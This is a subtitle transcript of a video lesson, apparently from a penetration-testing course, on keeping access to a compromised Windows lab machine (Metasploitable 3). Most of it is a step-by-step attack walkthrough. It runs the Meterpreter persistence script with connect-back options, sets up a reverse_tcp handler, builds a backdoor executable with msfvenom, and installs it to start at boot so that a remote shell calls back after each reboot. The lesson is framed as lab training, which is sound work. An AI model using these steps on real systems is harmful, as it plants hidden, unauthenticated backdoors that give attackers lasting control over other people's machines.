1
00:00:01,180 --> 00:00:05,200
Now, as I said before, creating a backdoor.

2
00:00:06,550 --> 00:00:08,000
Might be a good way to return.

3
00:00:09,040 --> 00:00:13,300
So I want to show you a few backdoors presented in Meterpreter.

4
00:00:14,300 --> 00:00:16,600
The first one is Meterpreter service.

5
00:00:17,930 --> 00:00:21,620
Or abbreviated to metsvc, as we see.

6
00:00:23,660 --> 00:00:28,490
So it's a standalone program, but it is implemented for Meterpreter.

7
00:00:29,800 --> 00:00:32,050
Now, a word of warning here before you go any further.

8
00:00:33,470 --> 00:00:36,080
That service requires no authentication.

9
00:00:37,500 --> 00:00:41,870
So it's better to be careful, because another one may connect to your backdoor.

10
00:00:43,040 --> 00:00:44,180
Now, next flavor.

11
00:00:45,170 --> 00:00:46,280
Persistence script.

12
00:00:47,580 --> 00:00:52,800
Metasploit also has a Meterpreter script, persistence.rb.

13
00:00:53,850 --> 00:00:59,550
And that's going to create a Meterpreter service that will be available to you even if the remote system

14
00:00:59,550 --> 00:01:00,540
is rebooted.

15
00:01:02,090 --> 00:01:09,050
So this way, if the service you initially exploited is down or patched, you can still gain access

16
00:01:09,050 --> 00:01:09,710
to the system.

17
00:01:10,830 --> 00:01:14,130
Another word of warning here before you go any further.

18
00:01:14,940 --> 00:01:19,170
The persistence script requires no authentication.

19
00:01:20,480 --> 00:01:27,160
So that means that anyone that gains access to the port could access your backdoor as well.

20
00:01:28,080 --> 00:01:32,910
OK, so the next flavor is a post module, persistence.

21
00:01:34,860 --> 00:01:37,440
Now it's more consistent than the other ones.
22
00:01:38,790 --> 00:01:45,270
Also, it allows you to create your own backdoor file from the beginning, but before running the module,

23
00:01:46,230 --> 00:01:50,350
you'll need to create the backdoor that contains the payload for us.

24
00:01:51,210 --> 00:01:53,750
So let's have a look at what we have.

25
00:01:55,190 --> 00:01:57,890
All right, so I've already gained access to the target system.

26
00:01:58,890 --> 00:02:03,810
And I'm going to use this session to perform persistence on my target.

27
00:02:05,130 --> 00:02:08,400
I'll use my first flavor, it's metsvc.

28
00:02:09,500 --> 00:02:11,810
But unfortunately, the script doesn't work properly at.

29
00:02:12,990 --> 00:02:16,950
So we're going to move on to the second one, the persistence script.

30
00:02:18,030 --> 00:02:22,860
So first, let's open up a new tab and go to the Meterpreter scripts directory.

31
00:02:24,140 --> 00:02:27,140
Type in vim persistence.rb.

32
00:02:28,750 --> 00:02:32,380
Now, this is the Meterpreter persistence script.

33
00:02:34,020 --> 00:02:40,800
When you follow the code, you will get the warning logic, and here's the help menu code for the script.

34
00:02:42,050 --> 00:02:48,500
And because Meterpreter scripts are now being made obsolete, you're not going to be able to display

35
00:02:48,500 --> 00:02:49,700
their help screens.

36
00:02:50,940 --> 00:02:54,030
So it's always a good practice to double check your parameters here.

37
00:02:55,210 --> 00:03:00,460
OK, quit vim and return to Meterpreter.

38
00:03:01,570 --> 00:03:04,480
Then type in run persistence.

39
00:03:07,640 --> 00:03:09,410
To start the agent at boot time.

40
00:03:10,360 --> 00:03:13,100
-P 4443.

41
00:03:13,510 --> 00:03:16,060
That's the port that the agent will connect back to.
42
00:03:17,270 --> 00:03:28,280
-i 5, it's the time interval for the agent to send reconnect probes. -r 10.10.2.11 is the

43
00:03:28,280 --> 00:03:30,230
connect back address for the agent.

44
00:03:30,350 --> 00:03:35,660
In this case, that's going to be the IP address of Kali, so we can enter.

45
00:03:37,160 --> 00:03:44,720
And also, you can specify a parameter to automatically create the handler.

46
00:03:46,070 --> 00:03:48,080
But right now, we're going to do it manually.

47
00:03:49,290 --> 00:03:51,060
And we'll send the session to the background.

48
00:03:53,540 --> 00:03:55,580
Use exploit.

49
00:03:56,510 --> 00:03:58,430
Multi handler.

50
00:04:00,990 --> 00:04:01,800
Set payload.

51
00:04:03,300 --> 00:04:04,620
To windows.

52
00:04:05,670 --> 00:04:06,540
Meterpreter.

53
00:04:07,990 --> 00:04:12,760
Reverse TCP. Set LHOST.

54
00:04:14,040 --> 00:04:19,320
To 10.10.2.11, the IP address of Kali.

55
00:04:20,460 --> 00:04:21,450
Set LPORT.

56
00:04:22,650 --> 00:04:24,390
To 4443.

57
00:04:25,910 --> 00:04:27,710
Now, show me the options.

58
00:04:30,370 --> 00:04:30,700
Good.

59
00:04:30,970 --> 00:04:33,310
Everything looks A-okay.

60
00:04:34,870 --> 00:04:36,610
So now exploit.

61
00:04:39,580 --> 00:04:42,370
And you'll see that the session opened immediately.

62
00:04:43,690 --> 00:04:49,510
But I really do need to be sure exactly, and you can also see.

63
00:04:51,110 --> 00:04:53,120
Big sessions.

64
00:04:55,490 --> 00:05:00,020
And here is your persistent session, over port 4443.

65
00:05:01,810 --> 00:05:03,970
Interact, session four.

66
00:05:05,290 --> 00:05:06,220
getuid.

67
00:05:07,780 --> 00:05:08,710
sysinfo.

68
00:05:10,310 --> 00:05:18,530
All right, see, so there is a persistent backdoor on Metasploitable 3. Now the backdoor will

69
00:05:18,530 --> 00:05:21,350
connect back to us when the system is awake.
70
00:05:22,950 --> 00:05:30,900
So let me warn you again about this script, it could cause problems, it has the potential, I'll say, to

71
00:05:30,900 --> 00:05:37,110
cause problems because someone else may connect to it, especially if you forget about it or you're

72
00:05:37,110 --> 00:05:38,250
just unaware.

73
00:05:38,790 --> 00:05:39,630
So remember that.

74
00:05:40,810 --> 00:05:42,670
So I'm going to go back to my original session.

75
00:05:45,580 --> 00:05:48,700
OK, so the next flavor is a post module.

76
00:05:50,030 --> 00:05:51,830
persistence_exe.

77
00:05:57,970 --> 00:05:59,960
So this is the information for this module.

78
00:06:00,670 --> 00:06:03,270
Now it's more consistent than the other ones.

79
00:06:05,120 --> 00:06:08,780
Also, it allows you to create your own backdoor file from the beginning.

80
00:06:10,490 --> 00:06:17,180
But before running the module, you'll need to create the backdoor that contains the payload for us.

81
00:06:18,380 --> 00:06:19,850
So let's open up a new tab.

82
00:06:22,350 --> 00:06:24,120
Type msfvenom.

83
00:06:25,850 --> 00:06:28,250
-p and then your payload name.

84
00:06:33,560 --> 00:06:38,570
And the payload options now: LHOST equals IP address of Kali.

85
00:06:42,000 --> 00:06:45,630
LPORT equals 4442.

86
00:06:47,380 --> 00:06:54,760
And other options. -f exe specifies the format of our final file.

87
00:06:55,900 --> 00:06:57,970
-a x86.

88
00:06:59,420 --> 00:07:01,640
Specifies the architecture of the final file.

89
00:07:03,280 --> 00:07:04,270
--platform windows.

90
00:07:06,550 --> 00:07:09,250
Specifies it as a Windows system file.

91
00:07:11,180 --> 00:07:15,350
-o defines the name of the produced payload file.

92
00:07:18,980 --> 00:07:20,920
persistence.exe.

93
00:07:29,090 --> 00:07:31,520
So let's go back to the Meterpreter session.

94
00:07:33,940 --> 00:07:40,960
Run post/windows/manage/persistence_exe.

95
00:07:43,210 --> 00:07:47,710
REXENAME equals persistence.exe.
96
00:07:48,710 --> 00:07:52,880
So this is the name that will be shown in the task list of the target.

97
00:07:54,540 --> 00:07:58,140
REXEPATH equals /root/Desktop/

98
00:08:00,170 --> 00:08:02,120
persistence.exe.

99
00:08:05,140 --> 00:08:06,420
This is our payload file.

100
00:08:08,410 --> 00:08:09,940
STARTUP equals SYSTEM.

101
00:08:12,070 --> 00:08:15,820
So this option enables the payload to start when the system is booted.

102
00:08:16,970 --> 00:08:18,290
OK, so hit enter.

103
00:08:22,010 --> 00:08:23,760
And the module successfully executed.

104
00:08:25,220 --> 00:08:28,760
So now let's start a handler for the module.

105
00:08:30,120 --> 00:08:32,520
So I'm already using the handler template.

106
00:08:34,230 --> 00:08:35,220
Show options.

107
00:08:38,260 --> 00:08:41,950
And I'll just set LPORT to 4442.

108
00:08:44,410 --> 00:08:45,340
And then exploit.

109
00:08:47,090 --> 00:08:50,240
All right, so I'm going to reboot my Metasploitable very quickly.

110
00:08:59,190 --> 00:09:05,040
Now, here, watch the Metasploitable screen on the left pane, you can easily see this session open.

111
00:09:07,330 --> 00:09:08,380
getuid.

112
00:09:10,010 --> 00:09:10,820
sysinfo.

113
00:09:13,320 --> 00:09:15,050
All righty, so this is what I want.

114
00:09:16,930 --> 00:09:21,710
But I also need to be sure, put it in the background, sessions.

115
00:09:22,410 --> 00:09:23,620
All right, so this is it.

116
00:09:24,490 --> 00:09:27,250
I have the connection on port 4442.

117
00:09:28,590 --> 00:09:30,330
Now, when the system reboots.

118
00:09:31,470 --> 00:09:33,720
We'll get a session on the target.